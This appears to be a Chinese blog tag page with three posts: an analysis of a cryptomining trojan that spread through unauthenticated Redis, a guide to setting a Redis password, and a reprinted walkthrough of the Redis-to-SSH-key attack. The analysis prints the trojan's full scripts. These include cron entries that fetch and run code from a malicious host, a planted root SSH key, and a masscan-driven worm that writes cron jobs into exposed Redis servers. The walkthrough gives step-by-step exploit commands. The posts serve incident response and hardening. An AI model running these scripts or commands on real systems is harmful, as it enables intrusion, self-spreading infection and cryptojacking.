The result of tag: (3 results)

木马分析:利用Redis未授权访问漏洞为传播介质的挖矿木马

by LauCyun Mar 19,2018 21:30:58 22,956 views

上周一,一大早收到阿里云的通知邮件说:我的云服务器存在恶意发包行为(如图1所示)。第一想法就是:“我擦,服务器被黑了!”。


图1 阿里云通知邮件(详细

分析之前,先介绍一下服务器环境:

  • 系统:
    • CentOS 6.5
  • 服务:
    • Redis 2.8.19(端口:6379)
    • SSH(端口:22)

0x01 取证

top命令查看当前系统的运行状态,发现有个叫做gpg-agentd的进程占用99%的CPU资源,如图2所示:


图2 系统运行状态

进一步寻找,发现它跟gpg-agent很相似,如图3所示:


图3 gpg-agentd

Google了一下gpg-agent,如下:

gpg-agent is a daemon to manage secret (private) keys independently from any protocol. It is used as a backend for gpg and gpgsm as well as for a couple of other utilities.

—— Using the GNU Privacy Guard: Invoking GPG-AGENT

gpg-agent的介绍知道,gpg-agent是一个守护程序,根据经验得知:gpg-agentd肯定不是一个正常的程序,虽然伪造的很好,但也逃不过我的那双犀利的眼睛。

接着就是排查,IO情况、网络流量、内存情况、系统日志、crontab等。边找边想,如果你是黑客要做坏事的话,会在哪里做文章,自动启动?定时启动?

先运行crontab -e命令,发现crontab有如下的任务:


图4 crontab任务

果然,线索找到了~

0x02 分析

1、分析脚本ash.php

图4的计划任务的意思是:每15分钟就下载脚本http://img.namunil.com/ash.php,并且执行它。先把它下载下来:

wget -q -O- http://img.namunil.com/ash.php

ash.php内容如下:

PATH=/usr/lib/sysstat:/usr/sbin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/sbin:/usr/local/bin
HISTSIZE=1
uname -a
id
hostname
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys
echo '*/15 * * * * wget -q -O- http://img.namunil.com/ash.php | sh' > /var/spool/cron/root
echo '*/20 * * * * wget -q -O- http://img.namunil.com/ash.php | sh' > /var/spool/cron/crontabs/root
echo 'wget -q -O- http://img.namunil.com/ash.php | sh' > /etc/rc.local
echo 'exit 0' >> /etc/rc.local

yum install -y bash curl 2>/dev/null
apt install -y bash curl 2>/dev/null
apt-get install -y bash curl 2>/dev/null

bash -c 'wget -q -O- http://img.namunil.com/bsh.php | bash' 2>/dev/null

其脚本的作用如下:

  • 首先,改变HISTSIZE的值 , 使其不能保存命令历史;
  • 然后,执行setenforce 0命令关闭SELinux,杰出shell资源访问限制;
  • 然后,在把SSH公钥添加到/root/.ssh/authorized_keys中,以便下次即可免密登录;
  • 然后,安装bash和curl;
  • 最后,就是下载第二个脚本http://img.namunil.com/bsh.php,并执行。

2、分析脚本bsh.php

继续下载并分析第二个脚本bsh.php,内容如下:

cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/...
sleep 1
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi	
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if ! [ -x /usr/bin/gpg-agentd ]; then
wget -q -O /usr/bin/gpg-agentd http://img.namunil.com/dump.db
echo '/usr/bin/gpg-agentd' > /etc/rc.local
echo 'wget -q -O- http://img.namunil.com/ash.php | sh' >> /etc/rc.local
echo 'exit 0' >> /etc/rc.local
fi
sleep 1
chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd
sleep 1
if ! [ -x "$(command -v masscan)" ]; then
rm -rf /var/lib/apt/lists/*
rm -rf x1.tar.gz
if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get update -y
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make gcc git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
fi
if [ -x "$(command -v yum)" ]; then
yum update -y
yum install -y epel-release
yum update -y
yum install -y git iptables make gcc redis libpcap libpcap-devel
yum install -y wget curl
fi
sleep 1
wget -q -O x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
sleep 1
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
fi
sleep 1 && rm -rf .watch
bash -c 'wget -q -O- http://img.namunil.com/rsh.php | bash' 2>/dev/null

这个脚本很长,但是其作用如下:

  • 首先,下载http://img.namunil.com/dump.db重名为gpg-agentd,并添加执行权限后运行;
  • 然后,修改开机启动rc.local,让/usr/bin/gpg-agentd开机启动和自动下载并执行脚本ash.php
  • 然后,安装一些列的软件,如make、gcc、git、libpcap等;
  • 然后,就是下载masscan,并解压、编译;
  • 最后,继续下载脚本http://img.namunil.com/rsh.php

那么masscan是个何物?官方介绍如下:

This is the fastest Internet port scanner. It can scan the entire Internet in under 6 minutes, transmitting 10 million packets per second.

It produces results similar to nmap, the most famous port scanner. Internally, it operates more like scanrand, unicornscan, and ZMap, using asynchronous transmission. The major difference is that it's faster than these other scanners. In addition, it's more flexible, allowing arbitrary address ranges and port ranges.

NOTE: masscan uses a custom TCP/IP stack. Anything other than simple port scans will cause conflict with the local TCP/IP stack. This means you need to either use the -S option to use a separate IP address, or configure your operating system to firewall the ports that masscan uses.

—— MASSCAN: Mass IP port scanner

看完介绍后,也就不难理解为什么阿里云说服务器存在恶意发包行为。

3、分析脚本rsh.php

继续下载和分析脚本rsh.php,内容如下:

setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
sleep 1
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set qwERZJSG "\n*/1 * * * * curl -fsSL http://img.namunil.com/ash.php | sh\n\n"' >> .dat
echo 'set ftEKeh "\n*/2 * * * * wget -q -O- http://img.namunil.com/ash.php | sh\n\n"' >> .dat
echo 'set ugwRFlSI "\n*/3 * * * * curl -fsSL http://img.namunil.com/ash.php | sh\n\n"' >> .dat
echo 'set ClOqrUQh "\n*/4 * * * * wget -q -O- http://img.namunil.com/ash.php | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
sleep 1
masscan --max-rate 15000 -p6379,6380 --shard 9130/22000 --exclude 224.0.0.0-255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 15000 -p6379,6380 192.168.0.0/16 172.16.0.0/16 14.18.0.0/16 14.238.0.0/16 14.138.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 15000 -p6379,6380 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null

如果说前两个脚本只是在服务器上下载执行了二进制文件,那这个脚本才真正显示病毒的威力。下面就来分析这个脚本:

  • 首先,修改系统环境之类就没啥好分析的,前面已经分析;
  • 接着,就是对redis进行配置,这个配置的内容如下:
    config set dbfilename "backup.db"
    save
    flushall
    set qwERZJSG "\n*/1 * * * * curl -fsSL http://img.namunil.com/ash.php | sh\n\n"
    set ftEKeh "\n*/2 * * * * wget -q -O- http://img.namunil.com/ash.php | sh\n\n"
    set ugwRFlSI "\n*/3 * * * * curl -fsSL http://img.namunil.com/ash.php | sh\n\n"
    set ClOqrUQh "\n*/4 * * * * wget -q -O- http://img.namunil.com/ash.php | sh\n\n"
    config set dir "/var/spool/cron/"
    config set dbfilename "root"
    save
    config set dir "/var/spool/cron/crontabs"
    save
    其主要的作用:利用 Redis 未授权访问漏洞把redis缓存内容写入/var/spool/cron/root/var/spool/cron/crontabs/root中,至于写入的内容就是上面分析的下载并执行ash.php
  • 最后,利用masscan进行全网扫描redis服务器,寻找肉鸡,如果你的redis的监听端口是公网IP或0.0.0.0,并且没有密码保护,那就写入上面的redis配置文件。

由于我的服务器是用于测试,所以没有做什么安全防护。真因为这,才导致服务器被黑。

4、分析gpg-agentd

gpg-agentd是用来干嘛?

第一个反应就是矿机,因为现在数字货币太火了,加大了分布式矿机的需求,也就催生了这条灰色产业链。

用ida分析gpg-agentd文件,搜索bitcoin、eth、mine等相关单词,最终发现了如图5所示:


图5 分析gpg-agentd

打开nicehash.com,瞬间就了然,如图6所示:


图6 nicehash

Google了一下svshost 1.0,结果没找到有用的信息。通过找类似的案例,发现一样本crondb,通过分析发现如图7所示:


图7 crondb样本

所以,crondbgpg-agentd用的是同一个挖矿程序,其源码:https://github.com/xmrig/xmrig

0x03 建议

通过上面的分析,该木马的行为是:先是将ssh公钥写入到/root/.ssh/authorized_keys中,拿到免密登录权限;然后下载执行远程二进制脚本和程序;最后通过redis漏洞,以指数级的速度在全网传播。

为了避免同类事件的发生,提出以下几个建议:

1、Redis方面

网络层加固

  • 指定 Redis 服务使用的网卡

    默认情况下,Redis 监听127.0.0.1。如果仅仅是本地通信,请确保监听在本地。

    这种方式可以在一定程度上缓解 Redis 未授权访问的风险(例外情况下,如果 Redis 以 root 用户运行,攻击者借助已有的 webshell,就可以利用该 Redis 来反弹 shell 以实现提权)。

    redis.conf文件中找到# bind 127.0.0.1,将前面的#去掉,然后保存。

    注意:

    • 该操作需要重启 Redis 才能生效。
    • 修改后只有本机才能访问 Redis,也可以指定访问源 IP 来访问 Redis。
      bind 192.168.1.100 10.0.0.1
  • 设置防火墙策略

    如果正常业务中 Redis 服务需要被其他服务器来访问,可以通过 iptables 策略,仅允许指定的 IP 来访问 Redis 服务。

    iptables -A INPUT -s x.x.x.x -p tcp --dport 6379 -j ACCEPT

设置访问密码

redis.conf中找到requirepass字段,去掉其注释,并在后面填上需要的密码。Redis 客户端也需要使用此密码来访问 Redis 服务。

打开/etc/redis/redis.conf配置文件:

​requirepass kzd&YvDvvc

确保密码的复杂度,配置完毕后重启服务即可生效。

服务运行权限最小化

请以较低权限账号运行 Redis 服务,并禁用该账号的登录权限。以下操作创建了一个无 home 目录权限,且无法登录的普通账号:

useradd -M -s /sbin/nologin [username]

注意:该操作需要重启 Redis 才能生效。

隐藏重要命令

Redis 无权限分离,其管理员账号和普通账号无明显区分。攻击者登录后可执行任意操作,因此需要隐藏以下重要命令:FLUSHDB, FLUSHALL, KEYS,PEXPIRE, DEL, CONFIG, SHUTDOWN, BGREWRITEAOF, BGSAVE, SAVE, SPOP, SREM, RENAME,DEBUG, EVAL

另外,在 Redis 2.8.1 及 Redis 3.x (低于 3.0.2) 版本下存在 EVAL 沙箱逃逸漏洞,攻击者可通过该漏洞执行任意 Lua 代码。

下述配置将config/flushdb/flushall设置为空,即禁用该命令;也可设置为一些复杂的、难以猜测的名字。

rename-command CONFIG ""
rename-command flushall ""
rename-command flushdb ""
rename-command shutdown shotdown_test

保存后,执行/etc/init.d/redis-server restart重启生效。

2、服务器方面

  • 服务器不使用默认的 22 端口

    22 端口是 SSH 服务的默认端口,这也是黑客扫描服务器 ssh 服务的默认端口。修改 SSH 端口的方法如下:vim编辑/etc/ssh/sshd_config,将其中的 Port 22 参数改成你想要的端口,通常 5 位数字最好。修改完成之后,重启 sshd 服务生效。

  • 禁止使用密码登陆,使用 RSA 公钥登陆

    本地机器可以使用ssh-keygen -t rsa生成公钥和私钥,然后将公钥追加到服务器上的~/.ssh/authorized_keys文件,注意此文件的权限是600。SSH 配置如下:

    RSAAuthentication yes # RSA认证
    PubkeyAuthentication yes # 开启公钥验证
    AuthorizedKeysFile .ssh/authorized_keys # 验证文件路径
    PasswordAuthentication no # 禁止密码认证
    PermitEmptyPasswords no # 禁止空密码

    最后重启 sshd 服务即可生效。

  • 禁止 root 用户登录

    线上服务器,我们通常会以普通用户登陆,然后再su root切换到root用户,这样做的好处是,即使被攻击了,也能有相应的保障。具体的方法是修改/etc/ssh/sshd_config配置文件,将PermitRootLogin改为no

0x04 类似案例

0x05 参考

最后的最后,分享一下样本,样本传送门:https://pan.baidu.com/s/1P1FFCzmhRQ2qROWEFbPWow

...

Tags Read More


如何给Redis配置认证密码

by LauCyun Nov 15,2015 13:29:36 9,157 views

前几日,Redis 未授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑。本文介绍如何给 Redis 服务器配置密码。漏洞分析传送门:Redis 未授权访问配合 SSH key 文件利用分析

打开配置文件redis.conf找到:

#requirepass foobared  

去掉行前的注释,并修改密码为所需的密码,保存文件

requirepass 123456

重启redis

$ sudo service redis restart

或者

$ sudo service redis stop  
$ sudo redis-server /etc/redis.conf 

这个时候尝试登录redis,发现可以登上,但是执行具体命令是提示操作不允许

$ redis-cli -h 127.0.0.1 -p 6379
$ redis 127.0.0.1:6379>
$ redis 127.0.0.1:6379> keys *
(error) ERR operation not permitted
$ redis 127.0.0.1:6379> select 1
(error) ERR operation not permitted
$ redis 127.0.0.1:6379[1]>

尝试用密码登录并执行具体的命令,看到可以成功执行

$ redis-cli -h 127.0.0.1 -p 6379 -a 123456  
$ redis 127.0.0.1:6379> keys *  
1) "myset"  
2) "mysortset"  
$ redis 127.0.0.1:6379> select 1  
OK  
$ redis 127.0.0.1:6379[1]> config get requirepass  
1) "requirepass"  
2) "123456"  

除了在登录时通过-a参数制定密码外,还可以登录时不指定密码,而在执行操作前进行认证。

$ redis-cli -h 127.0.0.1 -p 6379  
$ redis 127.0.0.1:6379> config get requirepass  
(error) ERR operation not permitted  
$ redis 127.0.0.1:6379> auth myRedis  
OK  
$ redis 127.0.0.1:6379> config get requirepass  
1) "requirepass"  
2) "123456"  

 

如果master配置了密码,那么slave也要配置相应的密码参数,否则无法进行正常复制的。

slave中配置文件内找到如下:

#masterauth  mstpassword 

移除注释,修改密码即可。

 

(本文完)

...

Tags Read More


Redis 未授权访问配合 SSH key 文件利用分析

by LauCyun Nov 12,2015 23:30:06 14,004 views

Redis 是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value 数据库,并提供多种语言的API。

Redis 未授权访问的问题是一直存在的问题,知道创宇安全研究团队历史上也做过相关的应急,今日,又出现 Redis 未授权访问配合 SSH key 文件被利用的情况,导致一大批 Redis 服务器被黑,今天我们来简要的分析下。

0x00 漏洞概述

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器。

Redis 安全模型的观念是: “请不要将 Redis 暴露在公开网络中, 因为让不受信任的客户接触到 Redis 是非常危险的” 。

Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99% 使用 Redis 的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。

因为其他受信任用户需要使用 Redis 或者因为运维人员的疏忽等原因,部分 Redis 绑定在 0.0.0.0:6379,并且没有开启认证(这是Redis 的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,将会导致 Redis 服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。

0x01 漏洞影响

Redis暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且没有开启相关认证和添加相关安全策略情况下可受影响而导致被利用。

通过 ZoomEye 的搜索结果显示,有 97707 在公网可以直接访问的 Redis 服务。


图1 ZoomEye搜索port:6379的搜索结果

根据 ZoomEye 的探测,全球无验证可直接利用 Redis 分布情况如下:


图2 全球无验证可直接利用 Redis 分布情况

全球无验证可直接利用 Redis TOP 10 国家与地区:


图3 全球无验证可直接利用 Redis TOP 10 国家与地区

0x02 漏洞分析与利用

首先在本地创建公私钥文件:

$ ssh-keygen -t rsa -C "RedisX"


图4 创建公私钥

然后将公钥写入 kack.txt 文件:

$ (echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > hack.txt

再连接 Redis 写入文件:

$ cat hack.txt | redis-cli -h 192.168.2.4 -x set crackit
OK
$ redis-cli -h 192.168.2.4
192.168.2.4:6379> config set dir /root/.ssh/
OK
192.168.2.4:6379> config get dir
1) "dir"
2) "/root/.ssh"
192.168.2.4:6379> config set dbfilename "authorized_keys"
OK
192.168.2.4:6379> save
OK
192.168.2.4:6379> 


图5 靶机 authotrized_keys 文件内容

这样就可以成功的将自己的公钥写入 /root/.ssh 文件夹的 authotrized_keys 文件里,然后攻击者直接执行:

$ ssh root@192.168.2.4

即可远程利用自己的私钥登录该服务器。

当然,写入的目录不限于 /root/.ssh 下的authorized_keys,也可以写入用户目录,不过 Redis 很多以 root 权限运行,所以写入 root 目录下,可以跳过猜用户的步骤。

0x03 漏洞危害

1、数据库数据泄露

Redis 作为数据库,保存着各种各样的数据,如果存在未授权访问的情况,将会导致数据的泄露,其中包含保存的用户信息等。


图6 Redis中的用户信息

2、代码执行

Redis 可以嵌套 Lua 脚本的特性将会导致代码执行, 危害同其他服务器端的代码执行, 样例如下        一旦攻击者能够在服务器端执行任意代码, 攻击方式将会变得多且复杂, 这是非常危险的.


图7 执行 Lua 脚本

通过Lua代码攻击者可以调用 redis.sha1hex() 函数,恶意利用 Redis 服务器进行 SHA-1 的破解。

3、敏感信息泄露

通过 Redis 的 INFO 命令, 可以查看服务器相关的参数和敏感信息, 为攻击者的后续渗透做铺垫。


图8 服务器敏感信息泄露

可以看到泄露了很多 Redis 服务器的信息, 有当前 Redis 版本, 内存运行状态, 服务端个数等等敏感信息。

0x04 安全建议

  • 配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379
  • 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中
  • 配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度
  • 好消息是Redis作者表示将会开发“real user”,区分普通用户和 admin 权限,普通用户将会被禁止运行某些命令,如 config

0x05 参考

*本文转载于:http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/

...

Tags Read More